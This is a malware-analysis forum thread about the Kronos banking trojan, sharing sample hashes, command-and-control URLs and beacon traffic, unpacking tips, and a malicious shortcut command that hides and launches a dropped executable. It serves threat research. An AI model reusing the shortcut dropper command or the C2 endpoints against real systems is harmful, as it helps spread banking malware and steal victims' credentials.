Kronos

Forum for analysis and discussion about malware.
User avatar
Intimacygel
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm

Tue Jul 15, 2014 1:49 pm

Hi All,

Was wondering if anyone has heard of or seen samples of the supposedly replacement for zeus "kronos"

http://www.csoonline.com/article/245363 ... um=twitter


Thanks!
Sargerras
Posts: 9
Joined: Mon May 13, 2013 12:23 pm

Tue Aug 05, 2014 9:30 am

Hi, just show up this thread.
http://securityblog.s21sec.com/2014/08/ ... -here.html

Sample of kronos attached

MD5: f085395253a40ce8ca077228c2322010
http://www.virustotal.com/file/9806d1b6 ... /analysis/
You do not have the required permissions to view the files attached to this post.
Kafeine
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm

Tue Jan 27, 2015 6:57 pm

A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
You do not have the required permissions to view the files attached to this post.
pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Wed Nov 25, 2015 6:50 pm

Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
You do not have the required permissions to view the files attached to this post.
comak
Posts: 43
Joined: Mon Oct 14, 2013 8:25 am
Contact:

Thu Nov 26, 2015 11:14 am

This is Kronos,

Code: Select all

http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
cheers,
mak
User avatar
EP_X0FF
Global Moderator
Posts: 4903
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Thu Nov 26, 2015 11:33 am

pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
henices
Posts: 3
Joined: Fri Aug 01, 2014 7:29 am
Contact:

Thu Dec 03, 2015 2:13 am

Kafeine wrote:A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80

Code: Select all

POST /krpanel/connect.php HTTP/1.1 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) 
Host: bitcoind.su 
Content-Length: 74 
Cache-Control: no-cache  

WzW,c`cfgcgzcozccazedzeefdfdb*W
attachment is the report.
You do not have the required permissions to view the files attached to this post.
pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Thu Dec 03, 2015 8:07 pm

EP_X0FF wrote:
pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
Thanks EP. ;)

after dumping second stage (explorer.exe) (change EP with PUSH/RET) using EBFE method for attaching using ollydbg.
i dunno why when i wanna set toggle bp on code, olly can't and run (memry regions are RWC!)
then i used f4 (run till selection) and hw bp.
but when call SYSENTER... i can't take control back to myself.
You do not have the required permissions to view the files attached to this post.
pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Fri Feb 12, 2016 10:27 am

i got another variant of Zbot on my system today.
.rsrc section is base64 encoded. first i thought about Ranbyus banking trojan.
also a shortcut created for running malware with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

export table contains callback function. i checked it by Ida and i didn't see any useful call.
where i should start?


sample attached.
You do not have the required permissions to view the files attached to this post.
puzzlex
Posts: 20
Joined: Tue Oct 20, 2015 12:22 pm

Fri Feb 12, 2016 1:18 pm

This DqGLtNo.exe is packed multiple times. Here it is the final payload https://www.virustotal.com/en/file/18f8 ... /analysis/
You do not have the required permissions to view the files attached to this post.
Post Reply